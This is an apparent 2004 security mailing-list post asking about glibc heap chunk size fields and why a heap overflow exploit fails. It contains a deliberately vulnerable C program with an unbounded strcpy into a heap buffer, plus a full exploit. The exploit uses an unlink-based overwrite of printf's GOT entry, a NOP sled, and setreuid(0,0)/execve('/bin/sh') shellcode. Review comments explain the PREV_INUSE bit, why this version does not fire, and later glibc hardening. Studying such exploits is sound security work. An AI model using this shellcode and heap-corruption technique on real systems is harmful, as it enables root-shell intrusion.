heap overflows
From: <sigsegv () ureach com>
Date: 26 Feb 2004 23:42:07 -0000
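Hi everyone, some questions about heap overflows:

a. On examining the memory I find that the 'size' field is one more than the total length of the memory chunk. Why is this so?

b. My exploit does not work. Am I doing something wrong?

Environment: Linux 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux, gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5), glibc-2.3.2-11.9

thanks a zillion

Here is my sample vulnerable code:

Code:
#include <stdio.h>
#include <stdlib.h>   /* malloc, free, exit */
#include <string.h>   /* strcpy */

#define MALLOCED_SIZE 64

/*
 * Deliberately vulnerable test program: argv[1] is copied into a 64-byte heap
 * buffer with strcpy(), so an argument longer than 63 bytes runs into the
 * header (prev_size, size, fd, bk) of the chunk allocated right after it.
 *
 * NOTE(review), question (a): the low three bits of a chunk's size field are
 * flag bits, not length. Bit 0 is PREV_INUSE and is set while the preceding
 * chunk is allocated, so a 72-byte chunk reads 0x49 -- the "one more" you see.
 *
 * NOTE(review), question (b): on 32-bit glibc 2.3.x a malloc(64) request is
 * rounded to a 72-byte chunk, and 72 is exactly the default fastbin limit
 * (request2size(DEFAULT_MXFAST)). free() of a fastbin-sized chunk just pushes
 * it on a fastbin and never examines the following chunk's fd/bk, so the
 * unlink() write the exploit below relies on is not performed for this size;
 * confirm against this glibc's malloc.c. A request above the fastbin limit
 * (e.g. 128) goes through the normal free path. Independently of that, no
 * printf() is called after the frees, so a hijacked printf GOT entry would
 * never be used by this program; the only libc call after the corrupting
 * free() is the second free().
 */
int main(int argc, char **argv)
{
    char *malloced_buffer1;
    char *malloced_buffer2;

    if (argc == 1) {
        fprintf(stderr, "\nUsage: %s <string1> \n\n", argv[0]);
        exit(0);
    }

    malloced_buffer1 = malloc(MALLOCED_SIZE);
    malloced_buffer2 = malloc(MALLOCED_SIZE);

    if (malloced_buffer1 && malloced_buffer2) {
        /* This is the address the exploit must use as RET_ADDR: the start of
         * the user data that the overflow fills with the jmp + NOPs + shellcode. */
        printf("Address returned by malloc: %p\n", malloced_buffer1);

        /* THE BUG: unbounded copy of untrusted argv[1] into a 64-byte buffer. */
        strcpy(malloced_buffer1, argv[1]);

        /* No trailing newline: stdout is buffered, so this text only shows up
         * when the buffer is flushed at exit (via write(), not printf). */
        printf("copied");

        /* free() of the first chunk is where glibc reads the (now corrupted)
         * header of the chunk that follows it. */
        free(malloced_buffer1);
        free(malloced_buffer2);
    }
    return 0;
}

Here is my exploit code for the above code:

Code:
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Sample exploit for the malloc-based buffer overflow in
 * samplecode_vulnerable_to_heap_overflow.c in the same directory.
 *
 * Strategy: the overflow rewrites the header of the second chunk so that
 * free() of the first chunk treats the second as free and unlinks it.
 * unlink() does FD->bk = BK and BK->fd = FD, i.e. it writes RET_ADDR to
 * RET_LOC + 12 and RET_LOC to RET_ADDR + 8 (32-bit chunk layout: prev_size at
 * +0, size at +4, fd at +8, bk at +12).
 *
 * The GOT entry for printf is the write target. Find it with:
 *   objdump --dynamic-reloc <binary>
 * In our case it is:
 *   0804966c R_386_JUMP_SLOT printf
 *
 * NOTE(review): see the comments in the vulnerable program for why this does
 * not fire as written (fastbin-sized chunk; printf not called after free).
 * Later glibc releases also verify FD->bk == P && BK->fd == P in unlink() and
 * validate the next chunk's size on the fastbin path, so this technique is
 * specific to unhardened allocators such as the poster's glibc 2.3.2.
 */
#define MALLOCED_SIZE 64
/* printf's GOT slot (0x0804966c) - 12, so that FD->bk = BK lands on the slot. */
#define RET_LOC  0x08049660
/* Must equal the "Address returned by malloc" value printed by the target. */
#define RET_ADDR 0x080497a8

/*
 * 31 bytes setreuid(0, 0) execve /bin/sh shellcode - linux-x86
 * - by bighawk (bighawk-at-warfare.com)
 * http://www.groar.org/expl/linux-x86/setreuid.c
 *
 * Block comments are used between the string pieces on purpose: with line
 * comments, any collapsing of the listing onto one line (as in this archive)
 * would swallow the rest of the string literal.
 */
char shellcode[] =
    "\x31\xdb"              /* xor ebx, ebx */
    "\x31\xc9"              /* xor ecx, ecx */
    "\xf7\xe3"              /* mul ebx */
    "\xb0\x46"              /* mov al, 70 (setreuid) */
    "\xcd\x80"              /* int 80h */
    "\x53"                  /* push ebx */
    "\x68\x6e\x2f\x73\x68"  /* push dword 68732f6eh ("n/sh") */
    "\x68\x2f\x2f\x62\x69"  /* push dword 69622f2fh ("//bi") */
    "\x89\xe3"              /* mov ebx, esp */
    "\x52"                  /* push edx */
    "\x53"                  /* push ebx */
    "\x89\xe1"              /* mov ecx, esp */
    "\xb0\x0b"              /* mov al, 11 (execve) */
    "\xcd\x80";             /* int 80h */

/*
 * Builds the payload and exec()s the target with it as argv[1].
 *
 * Payload layout (MALLOCED_SIZE = 64):
 *   [0..1]   jmp short +12
 *   [2..32]  NOP sled
 *   [33..63] shellcode
 *   [64..67] prev_size of the next chunk
 *   [68..71] size of the next chunk
 *   [72..75] fd
 *   [76..79] bk
 *   [80]     NUL terminator (strcpy stops here)
 * None of the bytes above are 0x00, which strcpy() would stop at.
 */
int main(void)
{
    unsigned char buf[100];
    size_t sc_len = strlen(shellcode);              /* 31 */
    size_t nop_len = MALLOCED_SIZE - 2 - sc_len;    /* 31 */
    uint32_t v;

    /* "jmp short +12": execution resumes at buf+14, inside the NOP sled.
     * The hop is there to skip bytes 8..11, which unlink() overwrites with
     * RET_LOC when it performs BK->fd = FD. */
    buf[0] = 0xeb;
    buf[1] = 0x0c;
    memset(buf + 2, 0x90, nop_len);
    memcpy(buf + 2 + nop_len, shellcode, sc_len);

    /* The overflow of the destination buffer starts at byte 64. The header
     * fields are written with memcpy() instead of through a long* cast so
     * there is no misaligned or aliasing-violating store. */
    v = 0xfffffffc; memcpy(buf + MALLOCED_SIZE,      &v, sizeof v);  /* prev_size */
    v = 0xffffffff; memcpy(buf + MALLOCED_SIZE + 4,  &v, sizeof v);  /* size */
    v = RET_LOC;    memcpy(buf + MALLOCED_SIZE + 8,  &v, sizeof v);  /* fd = printf GOT - 12 */
    v = RET_ADDR;   memcpy(buf + MALLOCED_SIZE + 12, &v, sizeof v);  /* bk = shellcode address */

    /* Terminate directly after bk. The original put the NUL at +17, which
     * left buf[80] uninitialized: either a stray garbage byte is copied or,
     * if it happens to be 0, the string ends one byte early. */
    buf[MALLOCED_SIZE + 16] = '\0';

    /* argv[0] used to be split with a backslash-newline inside the literal,
     * which spliced a stray space into the name. */
    execl("./samplecode_vulnerable_to_heap_overflow",
          "samplecode_vulnerable_to_heap_overflow", (char *)buf, (char *)0);
    perror("execl failed");
    return 1;
}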